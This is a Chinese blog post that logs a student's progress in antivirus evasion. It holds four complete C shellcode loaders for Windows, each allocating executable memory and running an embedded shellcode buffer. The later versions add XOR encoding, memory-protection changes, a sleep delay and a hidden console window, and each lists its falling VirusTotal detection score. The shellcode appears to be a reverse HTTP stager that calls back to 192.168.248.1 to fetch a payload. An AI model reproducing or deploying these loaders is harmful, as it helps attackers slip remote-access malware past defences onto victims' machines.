菜鸡的0基础免杀学习记录
免杀
0
Word Count: 4.6k(words)
Read Count: 27(minutes)
前言
其实一直对免杀挺感兴趣的,但一直没有下定决心系统的学习,只是半路拿来别人写的过来用一下,所以这次想从最基本的方法开始学习免杀,作为一个记录贴将持续更新免杀方法、代码以及其中我没掌握的知识点。
参考链接
https://hack-for.fun/bd13.html
windows API/源码函数学习
VirtualAlloc
1
2
3
4
5
6
| LPVOID VirtualAlloc(
LPVOID lpAddress,内存基址
SIZE_T dwSize,大小
DWORD flAllocationType,分配的类型
DWORD flProtect 该内存的初始保护属性 RWX?
);
|
最简单直接加载shellcode
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
| #include <Windows.h>
int wmain(int argc, TCHAR* argv[]) {
int shellcode_size = 0;
DWORD dwThreadId;
HANDLE hThread;
unsigned char buf[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x50\x00\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x4f\x69\x42\x63\x00\x3b\xba\x07\xca\x0e\x71\x39\x4d\xf4\x73\xa0\x65\x60\xbc\x40\x25\xa0\x17\x51\xb3\xcc\xe5\x79\x2f\xfb\x20\x19\xa8\x1a\x58\x78\x64\x4e\xf7\x12\xef\x1d\x0e\xec\xe1\xf5\x65\x17\xc5\x2f\xe7\x82\xbb\x5e\x99\xa3\x50\x8b\x24\x8b\x9c\xf6\x14\xeb\x83\x4d\x85\x05\x85\x88\xf3\x0c\x81\xb1\x6a\x5a\x7d\x7b\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x38\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x34\x2e\x30\x3b\x20\x53\x4c\x43\x43\x32\x3b\x20\x2e\x4e\x45\x54\x20\x43\x4c\x52\x20\x32\x2e\x30\x2e\x35\x30\x37\x32\x37\x29\x0d\x0a\x00\x69\x9b\xe0\x7e\xb2\xb6\x38\x6a\xbc\x63\x5e\xf9\x85\x9c\x22\x64\x17\x40\x5a\x37\x76\xe0\x60\x04\x54\xf3\x6a\x65\x0b\x6e\x1e\x90\x87\xb9\xeb\xf9\x85\x0b\x22\xd7\x64\x40\x7c\x76\x54\xd6\x27\x7c\x18\x2c\x97\x47\x5d\x0c\x53\x8e\xc8\xec\xcc\x00\xde\xfd\xe8\x67\x80\xbb\xe5\xc6\x61\x14\x13\x3c\x21\x4e\x06\xf9\xd9\x21\xa7\x9d\x4e\x63\xc8\x3b\xae\x6e\xf2\xe3\x58\x29\x14\x9a\xb1\xec\xdd\xc6\xe4\x62\xd0\x21\x7c\xe4\xcf\x21\x51\xfd\x16\x7f\xcd\xfe\x68\xdc\xda\x17\x1c\xf7\xab\x35\x79\x45\x31\x17\xf1\x30\xfd\xdd\x4f\xfd\x35\xcf\x94\xaa\xbd\xcb\x13\x48\xd3\xa5\x2f\xb8\x98\xed\x65\x54\x18\x35\xb2\x3c\x23\x1b\x8d\xb4\x0d\x62\xcf\xe1\x9b\x7b\xe7\x63\x2a\x86\x8d\x16\xe4\xda\xfb\xa4\x03\x4b\x8e\x1e\x03\x03\xa3\x4d\x11\x1d\x2a\xbb\xc9\xe1\xbf\xb0\xa5\x23\x0d\xd6\x6d\x34\x99\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x32\x34\x38\x2e\x31\x00\x51\x09\xbf\x6d";
shellcode_size = sizeof(buf);
char* shellcode = (char*)VirtualAlloc(
NULL,
shellcode_size,
MEM_COMMIT,
PAGE_EXECUTE_READWRITE
);
CopyMemory(shellcode, buf, shellcode_size);
hThread = CreateThread(
NULL,
NULL,
(LPTHREAD_START_ROUTINE)shellcode,
NULL,
NULL,
&dwThreadId
);
WaitForSingleObject(hThread, INFINITE);
return 0;
}
|
免杀效果 vt 21/65
59b33f3b4a74e8930a5207bf209f961f45e5eef277c19553c8c5ad3fe203c20d
简单加载器+shellcode XOR
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
| #include <Windows.h>
#include <stdio.h>
int wmain(int argc, TCHAR* argv[]) {
int shellcode_size = 0;
DWORD dwThreadId;
HANDLE hThread;
unsigned char buf[] = "\xed\x59\x92\xf5\xe1\xf9\xd9\x11\x11\x11\x50\x40\x50\x41\x43\x40\x47\x59\x20\xc3\x74\x59\x9a\x43\x71\x59\x9a\x43\x09\x59\x9a\x43\x31\x59\x9a\x63\x41\x59\x1e\xa6\x5b\x5b\x5c\x20\xd8\x59\x20\xd1\xbd\x2d\x70\x6d\x13\x3d\x31\x50\xd0\xd8\x1c\x50\x10\xd0\xf3\xfc\x43\x50\x40\x59\x9a\x43\x31\x9a\x53\x2d\x59\x10\xc1\x77\x90\x69\x09\x1a\x13\x64\x63\x9a\x91\x99\x11\x11\x11\x59\x94\xd1\x65\x76\x59\x10\xc1\x41\x9a\x59\x09\x55\x9a\x51\x31\x58\x10\xc1\xf2\x47\x59\xee\xd8\x50\x9a\x25\x99\x59\x10\xc7\x5c\x20\xd8\x59\x20\xd1\xbd\x50\xd0\xd8\x1c\x50\x10\xd0\x29\xf1\x64\xe0\x5d\x12\x5d\x35\x19\x54\x28\xc0\x64\xc9\x49\x55\x9a\x51\x35\x58\x10\xc1\x77\x50\x9a\x1d\x59\x55\x9a\x51\x0d\x58\x10\xc1\x50\x9a\x15\x99\x59\x10\xc1\x50\x49\x50\x49\x4f\x48\x4b\x50\x49\x50\x48\x50\x4b\x59\x92\xfd\x31\x50\x43\xee\xf1\x49\x50\x48\x4b\x59\x9a\x03\xf8\x5e\xee\xee\xee\x4c\x7b\x11\x58\xaf\x66\x78\x7f\x78\x7f\x74\x65\x11\x50\x47\x58\x98\xf7\x5d\x98\xe0\x50\xab\x5d\x66\x37\x16\xee\xc4\x59\x20\xd8\x59\x20\xc3\x5c\x20\xd1\x5c\x20\xd8\x50\x41\x50\x41\x50\xab\x2b\x47\x68\xb6\xee\xc4\xfa\x62\x4b\x59\x98\xd0\x50\xa9\x41\x11\x11\x11\x5c\x20\xd8\x50\x40\x50\x40\x7b\x12\x50\x40\x50\xab\x46\x98\x8e\xd7\xee\xc4\xfa\x48\x4a\x59\x98\xd0\x59\x20\xc3\x58\x98\xc9\x5c\x20\xd8\x43\x79\x11\x13\x51\x95\x43\x43\x50\xab\xfa\x44\x3f\x2a\xee\xc4\x59\x98\xd7\x59\x92\xd2\x41\x7b\x1b\x4e\x59\x98\xe0\x59\x98\xcb\x58\xd6\xd1\xee\xee\xee\xee\x5c\x20\xd8\x43\x43\x50\xab\x3c\x17\x09\x6a\xee\xc4\x94\xd1\x1e\x94\x8c\x10\x11\x11\x59\xee\xde\x1e\x95\x9d\x10\x11\x11\xfa\xc2\xf8\xf5\x10\x11\x11\xf9\xb3\xee\xee\xee\x3e\x5e\x78\x53\x72\x11\x2a\xab\x16\xdb\x1f\x60\x28\x5c\xe5\x62\xb1\x74\x71\xad\x51\x34\xb1\x06\x40\xa2\xdd\xf4\x68\x3e\xea\x31\x08\xb9\x0b\x49\x69\x75\x5f\xe6\x03\xfe\x0c\x1f\xfd\xf0\xe4\x74\x06\xd4\x3e\xf6\x93\xaa\x4f\x88\xb2\x41\x9a\x35\x9a\x8d\xe7\x05\xfa\x92\x5c\x94\x14\x94\x99\xe2\x1d\x90\xa0\x7b\x4b\x6c\x6a\x11\x44\x62\x74\x63\x3c\x50\x76\x74\x7f\x65\x2b\x31\x5c\x7e\x6b\x78\x7d\x7d\x70\x3e\x25\x3f\x21\x31\x39\x72\x7e\x7c\x61\x70\x65\x78\x73\x7d\x74\x2a\x31\x5c\x42\x58\x54\x31\x29\x3f\x21\x2a\x31\x46\x78\x7f\x75\x7e\x66\x62\x31\x5f\x45\x31\x27\x3f\x20\x2a\x31\x46\x5e\x46\x27\x25\x2a\x31\x45\x63\x78\x75\x74\x7f\x65\x3e\x25\x3f\x21\x2a\x31\x42\x5d\x52\x52\x23\x2a\x31\x3f\x5f\x54\x45\x31\x52\x5d\x43\x31\x23\x3f\x21\x3f\x24\x21\x26\x23\x26\x38\x1c\x1b\x11\x78\x8a\xf1\x6f\xa3\xa7\x29\x7b\xad\x72\x4f\xe8\x94\x8d\x33\x75\x06\x51\x4b\x26\x67\xf1\x71\x15\x45\xe2\x7b\x74\x1a\x7f\x0f\x81\x96\xa8\xfa\xe8\x94\x1a\x33\xc6\x75\x51\x6d\x67\x45\xc7\x36\x6d\x09\x3d\x86\x56\x4c\x1d\x42\x9f\xd9\xfd\xdd\x11\xcf\xec\xf9\x76\x91\xaa\xf4\xd7\x70\x05\x02\x2d\x30\x5f\x17\xe8\xc8\x30\xb6\x8c\x5f\x72\xd9\x2a\xbf\x7f\xe3\xf2\x49\x38\x05\x8b\xa0\xfd\xcc\xd7\xf5\x73\xc1\x30\x6d\xf5\xde\x30\x40\xec\x07\x6e\xdc\xef\x79\xcd\xcb\x06\x0d\xe6\xba\x24\x68\x54\x20\x06\xe0\x21\xec\xcc\x5e\xec\x24\xde\x85\xbb\xac\xda\x02\x59\xc2\xb4\x3e\xa9\x89\xfc\x74\x45\x09\x24\xa3\x2d\x32\x0a\x9c\xa5\x1c\x73\xde\xf0\x8a\x6a\xf6\x72\x3b\x97\x9c\x07\xf5\xcb\xea\xb5\x12\x5a\x9f\x0f\x12\x12\xb2\x5c\x00\x0c\x3b\xaa\xd8\xf0\xae\xa1\xb4\x32\x1c\xc7\x7c\x25\x88\x11\x50\xaf\xe1\xa4\xb3\x47\xee\xc4\x59\x20\xd8\xab\x11\x11\x51\x11\x50\xa9\x11\x01\x11\x11\x50\xa8\x51\x11\x11\x11\x50\xab\x49\xb5\x42\xf4\xee\xc4\x59\x82\x42\x42\x59\x98\xf6\x59\x98\xe0\x59\x98\xcb\x50\xa9\x11\x31\x11\x11\x58\x98\xe8\x50\xab\x03\x87\x98\xf3\xee\xc4\x59\x92\xd5\x31\x94\xd1\x65\xa7\x77\x9a\x16\x59\x10\xd2\x94\xd1\x64\xc6\x49\x49\x49\x59\x14\x11\x11\x11\x11\x41\xd2\xf9\x8e\xec\xee\xee\x20\x28\x23\x3f\x20\x27\x29\x3f\x23\x25\x29\x3f\x20\x11\x40\x18\xae\x7c\x11";
shellcode_size = sizeof(buf);
for (int i = 0; i < shellcode_size; i++)
{
buf[i] = buf[i] ^ 17;
}
char* shellcode = (char*)VirtualAlloc(
NULL,
shellcode_size,
MEM_COMMIT,
PAGE_EXECUTE_READWRITE
);
CopyMemory(shellcode, buf, shellcode_size);
hThread = CreateThread(
NULL,
NULL,
(LPTHREAD_START_ROUTINE)shellcode,
NULL,
NULL,
&dwThreadId
);
WaitForSingleObject(hThread, INFINITE);
return 0;
}
|
免杀效果 vt14/62
ac7eea68dbdf30730fb38ac43d0671c88aacdbcb7b8289740d69e8208923b2df
简单加载器+修改内存页属性+sleep+shellcode xor异或
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
| #include <Windows.h>
#include <stdio.h>
int wmain(int argc, TCHAR* argv[]) {
int shellcode_size = 0;
DWORD dwThreadId;
HANDLE hThread;
DWORD dwOldProtect;
unsigned char buf[] = "\xed\x59\x92\xf5\xe1\xf9\xd9\x11\x11\x11\x50\x40\x50\x41\x43\x40\x47\x59\x20\xc3\x74\x59\x9a\x43\x71\x59\x9a\x43\x09\x59\x9a\x43\x31\x59\x9a\x63\x41\x59\x1e\xa6\x5b\x5b\x5c\x20\xd8\x59\x20\xd1\xbd\x2d\x70\x6d\x13\x3d\x31\x50\xd0\xd8\x1c\x50\x10\xd0\xf3\xfc\x43\x50\x40\x59\x9a\x43\x31\x9a\x53\x2d\x59\x10\xc1\x77\x90\x69\x09\x1a\x13\x64\x63\x9a\x91\x99\x11\x11\x11\x59\x94\xd1\x65\x76\x59\x10\xc1\x41\x9a\x59\x09\x55\x9a\x51\x31\x58\x10\xc1\xf2\x47\x59\xee\xd8\x50\x9a\x25\x99\x59\x10\xc7\x5c\x20\xd8\x59\x20\xd1\xbd\x50\xd0\xd8\x1c\x50\x10\xd0\x29\xf1\x64\xe0\x5d\x12\x5d\x35\x19\x54\x28\xc0\x64\xc9\x49\x55\x9a\x51\x35\x58\x10\xc1\x77\x50\x9a\x1d\x59\x55\x9a\x51\x0d\x58\x10\xc1\x50\x9a\x15\x99\x59\x10\xc1\x50\x49\x50\x49\x4f\x48\x4b\x50\x49\x50\x48\x50\x4b\x59\x92\xfd\x31\x50\x43\xee\xf1\x49\x50\x48\x4b\x59\x9a\x03\xf8\x5e\xee\xee\xee\x4c\x7b\x11\x58\xaf\x66\x78\x7f\x78\x7f\x74\x65\x11\x50\x47\x58\x98\xf7\x5d\x98\xe0\x50\xab\x5d\x66\x37\x16\xee\xc4\x59\x20\xd8\x59\x20\xc3\x5c\x20\xd1\x5c\x20\xd8\x50\x41\x50\x41\x50\xab\x2b\x47\x68\xb6\xee\xc4\xfa\x62\x4b\x59\x98\xd0\x50\xa9\x41\x11\x11\x11\x5c\x20\xd8\x50\x40\x50\x40\x7b\x12\x50\x40\x50\xab\x46\x98\x8e\xd7\xee\xc4\xfa\x48\x4a\x59\x98\xd0\x59\x20\xc3\x58\x98\xc9\x5c\x20\xd8\x43\x79\x11\x13\x51\x95\x43\x43\x50\xab\xfa\x44\x3f\x2a\xee\xc4\x59\x98\xd7\x59\x92\xd2\x41\x7b\x1b\x4e\x59\x98\xe0\x59\x98\xcb\x58\xd6\xd1\xee\xee\xee\xee\x5c\x20\xd8\x43\x43\x50\xab\x3c\x17\x09\x6a\xee\xc4\x94\xd1\x1e\x94\x8c\x10\x11\x11\x59\xee\xde\x1e\x95\x9d\x10\x11\x11\xfa\xc2\xf8\xf5\x10\x11\x11\xf9\xb3\xee\xee\xee\x3e\x5e\x78\x53\x72\x11\x2a\xab\x16\xdb\x1f\x60\x28\x5c\xe5\x62\xb1\x74\x71\xad\x51\x34\xb1\x06\x40\xa2\xdd\xf4\x68\x3e\xea\x31\x08\xb9\x0b\x49\x69\x75\x5f\xe6\x03\xfe\x0c\x1f\xfd\xf0\xe4\x74\x06\xd4\x3e\xf6\x93\xaa\x4f\x88\xb2\x41\x9a\x35\x9a\x8d\xe7\x05\xfa\x92\x5c\x94\x14\x94\x99\xe2\x1d\x90\xa0\x7b\x4b\x6c\x6a\x11\x44\x62\x74\x63\x3c\x50\x76\x74\x7f\x65\x2b\x31\x5c\x7e\x6b\x78\x7d\x7d\x70\x3e\x25\x3f\x21\x31\x39\x72\x7e\x7c\x61\x70\x65\x78\x73\x7d\x74\x2a\x31\x5c\x42\x58\x54\x31\x29\x3f\x21\x2a\x31\x46\x78\x7f\x75\x7e\x66\x62\x31\x5f\x45\x31\x27\x3f\x20\x2a\x31\x46\x5e\x46\x27\x25\x2a\x31\x45\x63\x78\x75\x74\x7f\x65\x3e\x25\x3f\x21\x2a\x31\x42\x5d\x52\x52\x23\x2a\x31\x3f\x5f\x54\x45\x31\x52\x5d\x43\x31\x23\x3f\x21\x3f\x24\x21\x26\x23\x26\x38\x1c\x1b\x11\x78\x8a\xf1\x6f\xa3\xa7\x29\x7b\xad\x72\x4f\xe8\x94\x8d\x33\x75\x06\x51\x4b\x26\x67\xf1\x71\x15\x45\xe2\x7b\x74\x1a\x7f\x0f\x81\x96\xa8\xfa\xe8\x94\x1a\x33\xc6\x75\x51\x6d\x67\x45\xc7\x36\x6d\x09\x3d\x86\x56\x4c\x1d\x42\x9f\xd9\xfd\xdd\x11\xcf\xec\xf9\x76\x91\xaa\xf4\xd7\x70\x05\x02\x2d\x30\x5f\x17\xe8\xc8\x30\xb6\x8c\x5f\x72\xd9\x2a\xbf\x7f\xe3\xf2\x49\x38\x05\x8b\xa0\xfd\xcc\xd7\xf5\x73\xc1\x30\x6d\xf5\xde\x30\x40\xec\x07\x6e\xdc\xef\x79\xcd\xcb\x06\x0d\xe6\xba\x24\x68\x54\x20\x06\xe0\x21\xec\xcc\x5e\xec\x24\xde\x85\xbb\xac\xda\x02\x59\xc2\xb4\x3e\xa9\x89\xfc\x74\x45\x09\x24\xa3\x2d\x32\x0a\x9c\xa5\x1c\x73\xde\xf0\x8a\x6a\xf6\x72\x3b\x97\x9c\x07\xf5\xcb\xea\xb5\x12\x5a\x9f\x0f\x12\x12\xb2\x5c\x00\x0c\x3b\xaa\xd8\xf0\xae\xa1\xb4\x32\x1c\xc7\x7c\x25\x88\x11\x50\xaf\xe1\xa4\xb3\x47\xee\xc4\x59\x20\xd8\xab\x11\x11\x51\x11\x50\xa9\x11\x01\x11\x11\x50\xa8\x51\x11\x11\x11\x50\xab\x49\xb5\x42\xf4\xee\xc4\x59\x82\x42\x42\x59\x98\xf6\x59\x98\xe0\x59\x98\xcb\x50\xa9\x11\x31\x11\x11\x58\x98\xe8\x50\xab\x03\x87\x98\xf3\xee\xc4\x59\x92\xd5\x31\x94\xd1\x65\xa7\x77\x9a\x16\x59\x10\xd2\x94\xd1\x64\xc6\x49\x49\x49\x59\x14\x11\x11\x11\x11\x41\xd2\xf9\x8e\xec\xee\xee\x20\x28\x23\x3f\x20\x27\x29\x3f\x23\x25\x29\x3f\x20\x11\x40\x18\xae\x7c\x11";
shellcode_size = sizeof(buf);
for (int i = 0; i < shellcode_size; i++)
{
buf[i] = buf[i] ^ 17;
}
char* shellcode = (char*)VirtualAlloc(
NULL,
shellcode_size,
MEM_COMMIT,
PAGE_READWRITE
);
CopyMemory(shellcode, buf, shellcode_size);
VirtualProtect(shellcode, shellcode_size, PAGE_EXECUTE, &dwOldProtect);
Sleep(2000);
hThread = CreateThread(
NULL,
NULL,
(LPTHREAD_START_ROUTINE)shellcode,
NULL,
NULL,
&dwThreadId
);
WaitForSingleObject(hThread, INFINITE);
return 0;
}
|
免杀效果 8/66
b07db5b474a3e42e444299f28a71e6fd8d5cf808d91d2680e4bece8d4bd89fc4
简单加载器+修改内存页属性+sleep+shellcode xor异或+去掉cmd黑框
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
| #include <Windows.h>
#include <stdio.h>
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
#pragma comment(linker, "/INCREMENTAL:NO")
#pragma comment(linker, "/section:.data,RWE")
int main(int argc, TCHAR* argv[]) {
int shellcode_size = 0;
DWORD dwThreadId;
HANDLE hThread;
DWORD dwOldProtect;
unsigned char buf[] = "\xed\x59\x92\xf5\xe1\xf9\xd9\x11\x11\x11\x50\x40\x50\x41\x43\x40\x47\x59\x20\xc3\x74\x59\x9a\x43\x71\x59\x9a\x43\x09\x59\x9a\x43\x31\x59\x9a\x63\x41\x59\x1e\xa6\x5b\x5b\x5c\x20\xd8\x59\x20\xd1\xbd\x2d\x70\x6d\x13\x3d\x31\x50\xd0\xd8\x1c\x50\x10\xd0\xf3\xfc\x43\x50\x40\x59\x9a\x43\x31\x9a\x53\x2d\x59\x10\xc1\x77\x90\x69\x09\x1a\x13\x64\x63\x9a\x91\x99\x11\x11\x11\x59\x94\xd1\x65\x76\x59\x10\xc1\x41\x9a\x59\x09\x55\x9a\x51\x31\x58\x10\xc1\xf2\x47\x59\xee\xd8\x50\x9a\x25\x99\x59\x10\xc7\x5c\x20\xd8\x59\x20\xd1\xbd\x50\xd0\xd8\x1c\x50\x10\xd0\x29\xf1\x64\xe0\x5d\x12\x5d\x35\x19\x54\x28\xc0\x64\xc9\x49\x55\x9a\x51\x35\x58\x10\xc1\x77\x50\x9a\x1d\x59\x55\x9a\x51\x0d\x58\x10\xc1\x50\x9a\x15\x99\x59\x10\xc1\x50\x49\x50\x49\x4f\x48\x4b\x50\x49\x50\x48\x50\x4b\x59\x92\xfd\x31\x50\x43\xee\xf1\x49\x50\x48\x4b\x59\x9a\x03\xf8\x5e\xee\xee\xee\x4c\x7b\x11\x58\xaf\x66\x78\x7f\x78\x7f\x74\x65\x11\x50\x47\x58\x98\xf7\x5d\x98\xe0\x50\xab\x5d\x66\x37\x16\xee\xc4\x59\x20\xd8\x59\x20\xc3\x5c\x20\xd1\x5c\x20\xd8\x50\x41\x50\x41\x50\xab\x2b\x47\x68\xb6\xee\xc4\xfa\x62\x4b\x59\x98\xd0\x50\xa9\x41\x11\x11\x11\x5c\x20\xd8\x50\x40\x50\x40\x7b\x12\x50\x40\x50\xab\x46\x98\x8e\xd7\xee\xc4\xfa\x48\x4a\x59\x98\xd0\x59\x20\xc3\x58\x98\xc9\x5c\x20\xd8\x43\x79\x11\x13\x51\x95\x43\x43\x50\xab\xfa\x44\x3f\x2a\xee\xc4\x59\x98\xd7\x59\x92\xd2\x41\x7b\x1b\x4e\x59\x98\xe0\x59\x98\xcb\x58\xd6\xd1\xee\xee\xee\xee\x5c\x20\xd8\x43\x43\x50\xab\x3c\x17\x09\x6a\xee\xc4\x94\xd1\x1e\x94\x8c\x10\x11\x11\x59\xee\xde\x1e\x95\x9d\x10\x11\x11\xfa\xc2\xf8\xf5\x10\x11\x11\xf9\xb3\xee\xee\xee\x3e\x5e\x78\x53\x72\x11\x2a\xab\x16\xdb\x1f\x60\x28\x5c\xe5\x62\xb1\x74\x71\xad\x51\x34\xb1\x06\x40\xa2\xdd\xf4\x68\x3e\xea\x31\x08\xb9\x0b\x49\x69\x75\x5f\xe6\x03\xfe\x0c\x1f\xfd\xf0\xe4\x74\x06\xd4\x3e\xf6\x93\xaa\x4f\x88\xb2\x41\x9a\x35\x9a\x8d\xe7\x05\xfa\x92\x5c\x94\x14\x94\x99\xe2\x1d\x90\xa0\x7b\x4b\x6c\x6a\x11\x44\x62\x74\x63\x3c\x50\x76\x74\x7f\x65\x2b\x31\x5c\x7e\x6b\x78\x7d\x7d\x70\x3e\x25\x3f\x21\x31\x39\x72\x7e\x7c\x61\x70\x65\x78\x73\x7d\x74\x2a\x31\x5c\x42\x58\x54\x31\x29\x3f\x21\x2a\x31\x46\x78\x7f\x75\x7e\x66\x62\x31\x5f\x45\x31\x27\x3f\x20\x2a\x31\x46\x5e\x46\x27\x25\x2a\x31\x45\x63\x78\x75\x74\x7f\x65\x3e\x25\x3f\x21\x2a\x31\x42\x5d\x52\x52\x23\x2a\x31\x3f\x5f\x54\x45\x31\x52\x5d\x43\x31\x23\x3f\x21\x3f\x24\x21\x26\x23\x26\x38\x1c\x1b\x11\x78\x8a\xf1\x6f\xa3\xa7\x29\x7b\xad\x72\x4f\xe8\x94\x8d\x33\x75\x06\x51\x4b\x26\x67\xf1\x71\x15\x45\xe2\x7b\x74\x1a\x7f\x0f\x81\x96\xa8\xfa\xe8\x94\x1a\x33\xc6\x75\x51\x6d\x67\x45\xc7\x36\x6d\x09\x3d\x86\x56\x4c\x1d\x42\x9f\xd9\xfd\xdd\x11\xcf\xec\xf9\x76\x91\xaa\xf4\xd7\x70\x05\x02\x2d\x30\x5f\x17\xe8\xc8\x30\xb6\x8c\x5f\x72\xd9\x2a\xbf\x7f\xe3\xf2\x49\x38\x05\x8b\xa0\xfd\xcc\xd7\xf5\x73\xc1\x30\x6d\xf5\xde\x30\x40\xec\x07\x6e\xdc\xef\x79\xcd\xcb\x06\x0d\xe6\xba\x24\x68\x54\x20\x06\xe0\x21\xec\xcc\x5e\xec\x24\xde\x85\xbb\xac\xda\x02\x59\xc2\xb4\x3e\xa9\x89\xfc\x74\x45\x09\x24\xa3\x2d\x32\x0a\x9c\xa5\x1c\x73\xde\xf0\x8a\x6a\xf6\x72\x3b\x97\x9c\x07\xf5\xcb\xea\xb5\x12\x5a\x9f\x0f\x12\x12\xb2\x5c\x00\x0c\x3b\xaa\xd8\xf0\xae\xa1\xb4\x32\x1c\xc7\x7c\x25\x88\x11\x50\xaf\xe1\xa4\xb3\x47\xee\xc4\x59\x20\xd8\xab\x11\x11\x51\x11\x50\xa9\x11\x01\x11\x11\x50\xa8\x51\x11\x11\x11\x50\xab\x49\xb5\x42\xf4\xee\xc4\x59\x82\x42\x42\x59\x98\xf6\x59\x98\xe0\x59\x98\xcb\x50\xa9\x11\x31\x11\x11\x58\x98\xe8\x50\xab\x03\x87\x98\xf3\xee\xc4\x59\x92\xd5\x31\x94\xd1\x65\xa7\x77\x9a\x16\x59\x10\xd2\x94\xd1\x64\xc6\x49\x49\x49\x59\x14\x11\x11\x11\x11\x41\xd2\xf9\x8e\xec\xee\xee\x20\x28\x23\x3f\x20\x27\x29\x3f\x23\x25\x29\x3f\x20\x11\x40\x18\xae\x7c\x11";
shellcode_size = sizeof(buf);
for (int i = 0; i < shellcode_size; i++)
{
buf[i] = buf[i] ^ 17;
}
char* shellcode = (char*)VirtualAlloc(
NULL,
shellcode_size,
MEM_COMMIT,
PAGE_READWRITE
);
CopyMemory(shellcode, buf, shellcode_size);
VirtualProtect(shellcode, shellcode_size, PAGE_EXECUTE, &dwOldProtect);
Sleep(2000);
hThread = CreateThread(
NULL,
NULL,
(LPTHREAD_START_ROUTINE)shellcode,
NULL,
NULL,
&dwThreadId
);
WaitForSingleObject(hThread, INFINITE);
return 0;
}
|
免杀效果VT 7/64
a7a87509ad387960dedd08a609db3fe3c935cefc52b8ae97f5b761b1ac6ff7d3
更新记录
本次更新于2021.12.2,静态免杀效果VT 7/64,期末了,要准备期末考试,还要看论文,只能每天抽点时间去学相关知识。
todo:
远程加载shellcode
更高级的shellcode混淆方法(对称加密)
ctf 隐写shellcode?
-
Article Link
https://polosec.github.io/2021/12/02/%E8%8F%9C%E9%B8%A1%E7%9A%840%E5%9F%BA%E7%A1%80%E5%85%8D%E6%9D%80%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95/
-
Copyright Notice: All articles in this blog, unless otherwise stated, are under the CC BY 4.0 CN agreement.Reprint please indicate the source!
